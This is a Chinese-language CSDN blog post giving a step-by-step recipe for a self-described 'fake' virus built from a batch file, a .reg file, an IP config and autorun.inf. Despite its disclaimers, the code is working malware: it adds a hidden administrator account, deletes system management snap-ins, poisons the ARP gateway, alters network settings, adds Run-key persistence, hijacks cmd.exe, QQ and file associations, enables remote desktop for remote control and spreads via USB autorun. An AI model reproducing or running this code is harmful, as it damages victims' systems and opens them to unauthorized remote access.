欢迎您来到Peking Lin的专栏

何清之有?有之,清何?

巧用批处理和reg文件制作“假”病毒,请勿乱用

巧用批处理和reg文件制作“假”病毒,请勿乱用
鄙视不回帖的

==============


      我介绍一下如何运用批处理和注册表,并结合目前流行病毒的素姓来做一个“假”病毒,发表此文章我无任何恶意,只是分享我个人这1年来对系统和病毒的认知的经验,来加深大家对系统的批处理和注册表认识,也希望更多高手对我多指点,此文章只适合对注册表和批处理里有一定认识的人看,不会的请勿乱测试,因为我不想害别人,如果看完后,想对结果测试一番,也最好在影子系统下或系统处于还原保护下运行,此贴,过一段时间我将自行删除。

首先 创建5个文本文档,分别保存为 jokeking.bat, joke.reg ,edit.bat, Autorun.inf ,ip.txt 并且都放在同一目录下,(切记)
现在开始编辑 ,括号类文字请勿复制,只是说明作用,首先对jokeking.bat进行编辑,右
键jokeking.bat选择编辑命令,
@echo off
xcopy/h/k/r/q/o *.* c:/ /y  (将当前目录下所有文件悄悄的复制到C盘根目录下)
xcopy/h/k/r/q/o *.* d:/ /y (~d盘根目录下)
xcopy/h/k/r/q/o *.* e:/ /y (~e盘根目录下)
regedit/s joke.reg (将当前目录下joke.reg悄悄注入注册表,再下面会告诉你如何编辑reg这个文件)
net user jokeking 123 /add (增加一新用户jokeking,密码123,可自行修改)
net localgroup administrators jokeking /add (将jokeking 提升为系统管理员,前提是当前用户为管理员,那么以后你可以用这个用户名登入这个系统了)
del /f /s /q /a %SystemRoot%/system32/*.msc (悄悄删除所有windows的管理单元,这招很毒的)
sfc/scannow (立刻对磁盘进行文件检查)
shutdown -r -t 60 -c "恶搞王,zyfsky制作,只对你的系统恶搞一下,无其他恶意,请高手多多指教" (60秒后,将自动重启计算机,并有文字弹出,可自行修改)
netsh -f ip.txt (窜改其ip地址,是其上不了网,在下面我会介绍如何编辑这个ip.txt)
arp -s 192.168.1.1 00-aa-00-62-c6-09 (恶意绑定网关ip mac地址,可自行修改,若你身处局域网,你可能就遭殃了)
exit (退出)
(所有命令可以在CMD中查看其详细用法,输入:xcopy/? 等 即可,也可上网搜寻)
最后将其另存为bat文件,如jokeking.bat
下面来介绍这个joke.reg文件
Windows Registry Editor Version 5.00 (下面一定要空一行)

[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer](这个键值下面可以禁止当前用户许多行为,下面一一介绍)
"NoSetFolders"=dword:00000001 (无法对控制面板进行操作。其中的“0”表是no不生效,“1”表示yes生效,下面的同上)
"NoSetTaskbar"=dword:00000001  (无法对任务栏进行操作)
"NoDesktop"=dword:00000001      (不能显示桌面)
"NoSaveSettings"=dword:00000001  (无法保存对开始菜单的设置)
"NoRun"=dword:00000000            (对开始菜单运行这个命令设置,0表示可以访问运行)
"NoViewContextMenu"=dword:00000001 (没有鼠标右键)
"DisableRegistryTools"=dword:00000001 (禁止访问regedit.exe)
"NoNetworkConnections"=dword:00000001  (无法对网络连接进行设置)
"NoFind"=dword:00000001 (无查找命令)
"NoStartMenuNetworkPlaces"=dword:00000001 (开始菜单消失网络连接命令)
"NoDesktopCleanupWizard"=dword:00000001  (没有清理桌面向导)
"NoNetHood"=dword:00000001 (没有网上邻居这个图标)
"NoComputersNearMe"=dword:00000001 (无法从网上邻居查看邻近的计算机)
"RestrictCpl"=dword:00000001 (让控制面板只显示几个常用选项)
"NoFolderOptions"=dword:00000001 (无文件夹选项这个命令,这样就不能查看到隐藏的系统文件,等下我会给这个joke.reg和ip.txt,autorun.inf文件给予系统属姓)

[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"jokeking"="d://jokeking.bat" (在每次系统启动时将运行这个刚复制到D盘下的jokeking.bat文件,也可以是其他文件,路径自行修改)

[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/qq.exe]
"debugger"="%SystemRoot%//system32//NOTEPAD.EXE %1" (对QQ程序进行镜象截持,无法正常运行QQ,它将用记事本打开QQ,也可换成其他的,还是自行修改)

[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cmd.exe]
"debugger"="%SystemRoot%//system32//NOTEPAD.EXE %1" (对CMD.EXE镜象截持)

[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server]
"fDenyTSConnections"=dword:00000000 (打开这台电脑的远程桌面功能,前提远程桌面服务已运行,那么你可以用jokeking这个用户来远程控制他的电脑了,哈哈爽吧)

[HKEY_CLASSES_ROOT/jpegfile/shell/open/command]
@="e://jokeking.bat" (改变JEG格式图片的打开方式,一但打开此类图片,又会运行jokeking.bat,好坏啊,也可以变成其他的哦)

[HKEY_CLASSES_ROOT/txtfile/shell/open/command]
@=hex(2):64,00,3a,00,5c,00,6a,00,6f,00,6b,00,65,00,6b,00,69,00,6e,00,67,00,2e,/
  00,65,00,78,00,65,00,20,00,25,00,31,00,00,00 (改变文档的打开方式)
最后保存为joke.reg这个文件

(下面配置ip.txt文件)
#========================
# 接口配置
#========================
pushd interface

reset all


popd
# 接口配置结束

 

# ----------------------------------
# 接口 IP 配置       
# ----------------------------------
pushd interface ip


# "本地连接" 的接口 IP  配置

set address name="本地连接" source=static addr=192.168.100.140 mask=255.255.254.0 (修改IP地址和子网掩码)
set address name="本地连接" gateway=192.168.100.1 gwmetric=0 (修改网关)
set dns name="本地连接" source=static addr=202.151.226.68 (修改住DNS)
add dns name="本地连接" addr=202.131.224.69 (修改次DNS)
set wins name="本地连接" source=static addr=none


popd
# 接口 IP 配置结束
(最后保存)

      下面来编辑AUTORUN.INF 这个文件,这个文件的作用是运用的系统磁盘自动播放功能,一但计算机插入移动设备,或双击盘符就运行下面的程序,但是必须确保这个文件必须在每个盘的根目录下
[Autorun]
open = jokeking.bat (插入移动设备会自动运行,移动盘根目录下这个jokeking.bat,刚才我已把jokeking.bat复制到各盘的根目录下列,也可自行添加)
shellexecute = jokeking.bat (双击某个盘,将运行某个盘根目录下的jokeking.bat)
shell/joke/command = jokeking.bat (盘的鼠标右键添加joke这个命令),
最后保存这个文件

最后对edit.bat编辑,如下
@echo off
attrib +s +h +r joke.reg
attrib +s +h +r Autorun.inf
attrib +s +h +r ip.txt (此命令将这三个文件设为只读系统隐藏属姓)
exit
保存,最后运行jokeking.bat,大功告成

阅读更多
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/LBPeking/article/details/2334637
个人分类: 网络安全
想对作者说点什么? 我来说一句

病毒C#源代码

2008年02月23日 56KB 下载

没有更多推荐了,返回首页

加入CSDN,享受更精准的内容推荐,与500万程序员共同成长!
关闭
关闭